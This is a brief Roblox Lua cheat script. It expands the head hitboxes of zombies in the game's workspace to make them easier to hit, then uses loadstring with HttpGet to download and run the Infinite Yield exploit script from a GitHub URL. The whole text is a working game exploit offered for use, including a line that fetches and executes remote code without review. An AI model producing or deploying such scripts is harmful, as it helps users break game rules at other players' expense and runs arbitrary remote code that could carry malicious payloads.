game.Workspace.Zombies.DescendantAdded:Connect(function(z) local h = z:FindFirstChild("Head") if z:IsA("Model") and h then h.Size, h.Transparency = Vector3.new(10, 10, 10), 0.5 end end) loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()